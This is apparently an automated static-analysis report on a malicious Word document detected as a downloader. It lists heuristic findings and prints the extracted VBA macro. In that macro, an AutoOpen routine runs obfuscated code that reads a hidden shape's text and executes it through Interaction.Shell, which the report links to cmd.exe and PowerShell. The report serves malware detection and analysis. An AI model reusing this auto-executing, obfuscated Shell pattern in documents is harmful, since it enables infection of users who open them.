Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b31f96dae9195060…

MALICIOUS

Office (OLE)

138.9 KB Created: 2018-12-06 13:33:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: c279ec522ad980f7ace865ff4d3af6a6 SHA-1: 068263b5746c24cf0f891b09f58c11793fa4fe9d SHA-256: b31f96dae9195060e1a86f72d814d4ad0763ab605d2cb05881959e36dc2afc5f
292 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6775056-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775056-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    tlNlMah = Array(uoSIDS, jdjdo, BHnbjzz, Interaction _
.Shell(RrbAu, rGikq), VRDCmHh)
   bnwfcvrCnEqFcPPlEwwnHFU = 134749510 * CInt(164035308) + KtVwGAfoNNCNuJ + CLng(8717066 + Sgn(dDpduIRHwPVcmWSb) - 41568279 * 174243526) - zhpzpanCBjrDomubRfvHB + Chr(NBqfDBqvaHUYDjoFzDG) * 42391753 / CStr(102372917) / (FLjpsvBwLSjVTnGKWlL / 42360380 / kjQiNmLjrAvMpwf / Fix(NJvuiwBphMBzohVuJPVcQGiI + Hex(QTRoIdrbMIcQMdnibAAlMr) + 66326017 + CBool(209038550 + DaaCiGimEOcjAZ)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
KbKzvbVL
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9882 bytes
SHA-256: d73487beeea6ec614233a5a604522fc6c8a32cdd443d75b4935f64899db80abf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
227 of 276 identifiers look randomly generated (e.g. 'BvtnDFcJGDWsjUvSizJrRwzU') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OEbzJSwnlTQjrT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
KbKzvbVL
End Sub

Attribute VB_Name = "ZOUTCWm"
Function KbKzvbVL()
On Error Resume Next
   NTwzAzbAmKjSjImhfk = 334877587 * CInt(134732820) + iocSXMFwShpqTzMToUCSDpBZ + CLng(83422261 + Sgn(CzswpFWYiiUfckWDUcrcNLZO) - 284405309 * 104899984) - BvtnDFcJGDWsjUvSizJrRwzU + Chr(hkiraiEZIUdlrRZAaPA) * 334177569 / CStr(234527666) / (IStqOiYiFvYOVVu / 123197845 / YRTazRjqhjrrjzVpZcPw / Fix(QWAiOhNcvDFHjbhQhIAMA + Hex(whnYvCZwtiUwIuTwlkTN) + 250948663 + CBool(210601639 + jzYoZrTPljjYSqplKDzKb)))
   MEYsRwfbSicHwmIRRNXzc = 103878475 * CInt(270110075) + lQdThjNGslwqlNjfa + CLng(140480490 + Sgn(KUjJkiwzhjuHwPHHBTMu) - 227520692 * 140634332) - PLnRjDisZHiiwEHsol + Chr(fZwdBbdGhLNbwpwRzwMQuD) * 265889168 / CStr(139877333) / (NlLCtaXJwpvQhm / 278854984 / wwjMjkpznJwcUs / Fix(lcdopSEnlpSCzDAPKWOz + Hex(IJUdvNOkivoENKn) + 31441011 + CBool(329022244 + jrIuWOipumtlGG)))
   ZiZkcoYPhCPnmN = 83640607 * CInt(92108820) + wouLsPZOADsZJWK + CLng(16514210 + Sgn(CITEFVTRmtWTrosZY) - 261531410 * 314274879) - qjTzVbkfpYjFlVL + Chr(uArTbuGVCvJPAz) * 245850916 / CStr(226525948) / (taVpUiiknbNNRhVco / 208489583 / wcjvawwZRUfpmzqrvqP / Fix(RMjoSsHkOomLUNlmMiv + Hex(XJMPHlaPbqamZFGjtsdhqML) + 191394113 + CBool(224384910 + VZMDiQuYCIATjjSrIX)))
   ImKJSTHEzBIJUz = 46360470 * CInt(62553252) + tOBvLcMnTnTjwKScKZuwJ + CLng(290270840 + Sgn(CJjWjBvnlGhuVJIwJwVwjo) - 157375547 * 8739738) - pjJZMNZBYzlfGdlXAiaQQwS + Chr(dlzntJOmfjtUlN) * 165742259 / CStr(296588398) / (szKWQDVjajFzkas / 92856625 / vaQmIOlzzajRlmJ / Fix(JXzIfMicDSdIouFBGiRwc + Hex(kiZXRdlSptvQbCsFbi) + 291565117 + CBool(262975596 + plcLFUiKHUKEnmRjIvFql)))
   mwjvndvLcLfohijwTr = 270197193 * CInt(229769656) + hYZsiwcnjzmXHjXCrKUQpmbG + CLng(185281239 + Sgn(fVolXMJXFXJDIiSXwOtQZuL) - 301415270 * 182225770) - USGuzTQmTHwuZZOjiAsoB + Chr(zRqNNLRkJuJqrqRKaqmWLL) * 167200846 / CStr(7418463) / (TCqQLAnffVoDkGFUizDlih / 157700003 / TZCBidlspXtIbUwuW / Fix(MVcGqkhCdOVQGliX + Hex(lwmBBjwOMMwsOzJOYVCqNjST) + 187255794 + CBool(3881427 + WZRHiEYMvkJKljsiXkJ)))
Set MBhQbh = OEbzJSwnlTQjrT.Shapes(CjSYBLZo + "npvZVoC" + ESoqnOiPK).TextFrame
   XJAQwXJtEjHlRMjNVQ = 100663812 * CInt(204277104) + oipwzJdkmhpUEjGNtqSv + CLng(142440242 + Sgn(GiiikRwqtoOniaLRA) - 88586956 * 216065895) - RzSRNdczbawjLWb + Chr(TTZLmwnAFQAjCcp) * 34735911 / CStr(94686614) / (BHQNQGowOTsfcMwE / 326121666 / oUWUMRLwcwwzkrVwUUpG / Fix(SXniUIaoohwiIR + Hex(qjuzCTisBOjAJdriOriVzil) + 291189154 + CBool(58706464 + InPwVbacInZqEioilTkHQ)))
   PLNQRBdwMiBqDQWbQ = 325324809 * CInt(86866590) + MCRmrzaMdjiuXqoYFCDXz + CLng(337814166 + Sgn(nEUTwaKSICUDNtaY) - 117972622 * 179661082) - VdzGSMbwWOtqkMsdi + Chr(fbmTQWsDnaiidmvjdj) * 263455375 / CStr(326547301) / (HWcnDPLjqVQsBm / 340705891 / CMdOPZATskHuDjLpkWYE / Fix(fMHjTwFNlbzwCaTK + Hex(lhWIvSHRjHJbIfNvVXzWh) + 316905746 + CBool(188128702 + GGJHwBIsiBkqiAkuzOmpvmdw)))
   pWBOoMQOPijRaiMziWLu = 299397073 * CInt(32279653) + zmEWrVYYBzWiFLH + CLng(59875044 + Sgn(nJbQOThPinVYwvk) - 240870862 * 101202182) - cjqZtrKiUEDGlX + Chr(DGjdqlSWGIiDzEBl) * 303213062 / CStr(279215767) / (iZROQkGkwdLbBwLs / 272012464 / HYQJMjQLoLZTSJ / Fix(csnmsTtjBUtvhhFnM + Hex(kmRtUNhzFvvKfKBL) + 163792813 + CBool(37040113 + GzhOpPpTojijXNHhXwi)))
   WFsjLjnlQuRFOISRSEMlHcFi = 63262955 * CInt(332501609) + FbQofzfqkpQqWf + CLng(204078883 + Sgn(ijijFDSoDjsruzNWMfhKz) - 34581886 * 250843863) - jShbBOpFcsaviSv + Chr(IclwGnvlctdqzU) * 238279182 / CStr(167288275) / (YwmWrmpqnPCZSsukjBXUnzvW / 317471224 / IlwHHHBwFVIfRpvISYtLKBiG / Fix(SMFJYBQariEsjHuYT + Hex(ZcBkhYijXckpGCspovvojU) + 291280133 + CBool(32739275 + LrQmQznqPJdQifhisin)))
RrbAu = MBhQbh.ContainingRange + jnivv + CqQLqdDt + Oiwij + hVDEXnv + wSHBUz + XAnXzBia + jouzLzi + LcvpwNA + LLvBVKjX
   fOKROfNbbzsrCErJO = 46395175 * CInt(197733351) + dGutobJoOTCWOqY + CLng(42647946 + Sgn(DjSXUFvMoWTEiEEDEpZ) - 131930858 * 106178389) - nVYNHwWdMjljLXLiJAwh + Chr(FqkjPwSKBwmKZwwwGzwqKJmT) * 310412818 / CStr(295735929) / (rWjYViiifodswDTLhwZl / 181299707 / jCCArovDQoWRaoVaR / Fix(vNQKcFzmrwEUVHFcmdV + Hex(rpnbXoWhcfqHhzqOzY) + 168037310 + CBool(326359601 + EzwzvSPLwBrEwk)))
   FmLptFRRQhTODzWsBzKXwob = 169171389 * CInt(213027645) + CUFYSjVFdBHbfkXPOQXtiq + CLng(331160029 + Sgn(tBiEvQKmJHCwLrPmswTUlaT) - 170782866 * 338559505) - ZLBmHMWLfQCRJMqVRYhb + Chr(WBlBjWdJThEEPq) * 340293297 / CStr(237677839) / (AqaAMwjaoGdQIvsYcD / 63538514 / kaqsBMizMuVrkvYrA / Fix(JCBarPzsKmMjmn + Hex(TlZzhwAQmNtkmfNWAXZtHO) + 67465636 + CBool(230679685 + tIBvljIiBRJzrTEJmPM)))
   BQSvFCjZUmvUWv = 18560719 * CInt(277013769) + zqwlPhCkTzMOjwljs + CLng(194494733 + Sgn(qrzUrmJCdwYYjh) - 39228861 * 91763978) - oSljQLlFXLopKliRCzaCV + Chr(zGiZnuYcjaiBuZ) * 288875047 / CStr(108269927) / (fLPTaVMTLuHjifLNkTf / 32721240 / XqjviNHIqEZmYvqGkYlSGcA / Fix(vwvWoKGMLkHUiYwHE + Hex(VqhuJkUHzvumkvqP) + 337325066 + CBool(208645741 + kUfwNaonWYLcdNvGJ)))
   EldwizjtEMJOmj = 127398230 * CInt(185505625) + jDpLuPiDnsriLqfF + CLng(297797810 + Sgn(JmUGknqOaqwridJDlIPt) - 68612570 * 145140955) - trEoOsWiIsAKprdSBUjorHv + Chr(NVIFXqAVnrbOjwbV) * 28792483 / CStr(80058545) / (ziTTLHqNYihCmwratkRHSs / 205211733 / wQPlDtKjfTwjuCwzjd / Fix(rFopRoYilnEVGzwUvsE + Hex(iUzXSAIjqnTapQoR) + 65586090 + CBool(176368996 + ziLYwazpkziAFcTzWHRWQjrs)))
   BFIIjKFjKWtVSQNqsA = 133443011 * CInt(156609444) + ELwRlGCciopDXD + CLng(179530641 + Sgn(ijQXPGcfwFPzivd) - 48457999 * 227255204) - zuKqwECEchERuNmjNR + Chr(zlziTVfqFzmLiV) * 21793623 / CStr(38281588) / (zokLVKiubiKCLuhLDijA / 79765911 / USNzGpWWwqHFmZhsiaSnsrU / Fix(tCFzimTFUGTRwYDpYEiTuG + Hex(HiKEIhYwdzYEEkW) + 284980422 + CBool(65504270 + BkjGPtGXdOnJBtmuzU)))
   lVvlOiIJnjzkLzTz = 9783957 * CInt(155065280) + MYnSJqosolcALpsOM + CLng(293716002 + Sgn(jBVhrZqCVDwuiZFoowDlua) - 249313948 * 134974607) - KjnuSlGENnPrrwsSoSp + Chr(quaFBEPJHtJPAJjtDHDSqqV) * 251396039 / CStr(278121066) / (wCLSGHwdhQGhtOVzzTdzqiPw / 102083716 / PWBAYoPDHNzonCTXbPnW / Fix(pwssCIqGOmMDZsZb + Hex(rSRqGHAIfbjSGALtTZaI) + 50650662 + CBool(150770963 + ZztbklOJtvuXVEXjosjW)))
   pRfbUhASoSFTNEiCYlVCGacL = 85217272 * CInt(71020266) + NjTLtcsfzjucYSTVALF + CLng(315019045 + Sgn(jPzuPwqOoTOJHmi) - 138392984 * 45078629) - qVYiSdJwknFbAHOS + Chr(TWRdjBQKPjTQfkAuzOZi) * 27002534 / CStr(320391283) / (lSLCJNTHupHPwpiKUH / 133697644 / wpjEDFhAspjaWB / Fix(KUwHzwZYbXUBEREFbjtX + Hex(mHzEfTOFGhszJXqVzWGXREj) + 225679921 + CBool(27798274 + injIqdikXNzDSdKTVqcE)))
   MMSbvfjKuCKjDSdSJmsED = 174317020 * CInt(125968457) + ICIrKWKQVFzYTnmPFdH + CLng(38016582 + Sgn(SQDIVWoFJfltqStXpzXsu) - 69895976 * 330532678) - FzVAczaSNrqlFjpAVL + Chr(aLfcVtsQdkNpHSiD) * 143152285 / CStr(6405903) / (cKETfwbIRFKXWjwYIaWAHk / 232106670 / hzCjSWjTzhiBVszdtlaKTNqG / Fix(uZczAhraHlfwspv + Hex(qYpAzCQbsHVKYdUJwaY) + 322809834 + CBool(24430582 + wzraOGThBvfldpBFLs)))
   jjfjPHQLwpEzuunlBOcmOKCk = 67128833 * CInt(129177907) + TAwzCUKiWvwYsOw + CLng(298492000 + Sgn(coITSDIJICiWjuWvAwK) - 331029401 * 286218754) - ijPRqDqjYSQdIV + Chr(nBzqnuScIpAbcsRl) * 309804953 / CStr(223439200) / (KYDBNETYdQFDmBkMvNH / 23402641 / MHHbpbNrHjVvhKm / Fix(zklUVoLCmNasfVYniTwRw + Hex(XdGjWjjHEqzcvdWjlXv) + 29361669 + CBool(270237913 + AUMlIiRNMVoaMHNoScT)))
Const rGikq = 0
   MFOXQvJKVJcNCBUndjbq = 213304034 * CInt(313489213) + bsuqZHcRUdnLvks + CLng(293158023 + Sgn(fYGwOjaTivjuuRwQwniWFk) - 19934505 * 296998858) - HkOpZCkrlLHpKMLTWqMsWZM + Chr(vwzNWkvVNFGwLiJtwDIGobm) * 172906418 / CStr(121816214) / (itqAWiXXuaEWVB / 102839703 / bEGPIshStSQFDTMXvTBBiN / Fix(YYojjobiHqBAhUDuqMYGD + Hex(SUaNhbBANIOUiqTIw) + 195947507 + CBool(119498153 + JPBTiDsYLoGGjGGUIVHAj)))
tlNlMah = Array(uoSIDS, jdjdo, BHnbjzz, Interaction _
.Shell(RrbAu, rGikq), VRDCmHh)
   bnwfcvrCnEqFcPPlEwwnHFU = 134749510 * CInt(164035308) + KtVwGAfoNNCNuJ + CLng(8717066 + Sgn(dDpduIRHwPVcmWSb) - 41568279 * 174243526) - zhpzpanCBjrDomubRfvHB + Chr(NBqfDBqvaHUYDjoFzDG) * 42391753 / CStr(102372917) / (FLjpsvBwLSjVTnGKWlL / 42360380 / kjQiNmLjrAvMpwf / Fix(NJvuiwBphMBzohVuJPVcQGiI + Hex(QTRoIdrbMIcQMdnibAAlMr) + 66326017 + CBool(209038550 + DaaCiGimEOcjAZ)))
   OapSzNTftwwWuz = 268153592 * CInt(147128430) + uOdMvpKYzRwPWPkAwP + CLng(220211995 + Sgn(tBNIlipPOsWSRXOiXoS) - 246837521 * 207907037) - wvVQWjNWwkHwcsBVaNzuJGu + Chr(zzBGdIwvuzDRmVLGBsum) * 71265764 / CStr(141054091) / (VcBOFllkrApTXhHspnLCdpji / 35491251 / tsRMIVbDfictrK / Fix(OMRzBoYuzEwzTRj + Hex(SIDstSirTrTBdPvwBtOcSlD) + 89768488 + CBool(135333644 + RIJVIlzlKlnRPwhZdJUWRjIC)))
   ztOvlIhZLwaPSXbazzGh = 187819428 * CInt(200847886) + rJWkBbTGdFDBNJnz + CLng(258612298 + Sgn(DVBSEcnPGamOsBTjWmOY) - 210921755 * 330184451) - pzJOVOQMCTEYJJYEtzlVsUO + Chr(CiimAiPwFdLVuORB) * 275089768 / CStr(93774130) / (vncJZwhUauczViwMnkdLT / 24931497 / TjwDKffkfikTaZY / Fix(oTOoCcdpmwBiRM + Hex(PrfJdbuXouJzVl) + 99055448 + CBool(146276832 + OfpsFPFqCJRLdBSTbUcuPu)))
   XoMnuPfnppMvnOsq = 254951708 * CInt(308451324) + HlbqFZJMvnZrXwmKPDlSI + CLng(41726549 + Sgn(GduruVzUWiEEawwG) - 90458079 * 240938759) - kAPzowBEdnBcZA + Chr(UMLiOqvTCNTuMNQwXh) * 31111056 / CStr(144805568) / (rjFutRWjVCfDCblv / 207220587 / MphNkVCpqMqduUiKdj / Fix(nVZYmjKorJlfAsL + Hex(jjivjrDaJqsIKYswFqrAnQv) + 213642168 + CBool(170595928 + LjEhqkiczizkVwRwPwnCd)))
   djwwrrAAkiPEqHBXvon = 314377710 * CInt(338004310) + mpcTSMYGFBnBjwcjujVOViw + CLng(138484631 + Sgn(ECHPJDtZltIWYZobddN) - 108597298 * 272904770) - FvLuGZkXEtHrNKRrvwu + Chr(uDTNVGhnrEiEmdzMDOw) * 131115986 / CStr(270836449) / (pPPhMdKmhPWOjCczY / 338376331 / zfzLCEkNFnjBamjNDwouDdF / Fix(TiYwvkGpzbripEMcbQ + Hex(wANwcAoYwkEoUZ) + 190793138 + CBool(290196489 + joSVhrDwuzYzmMSmYG)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.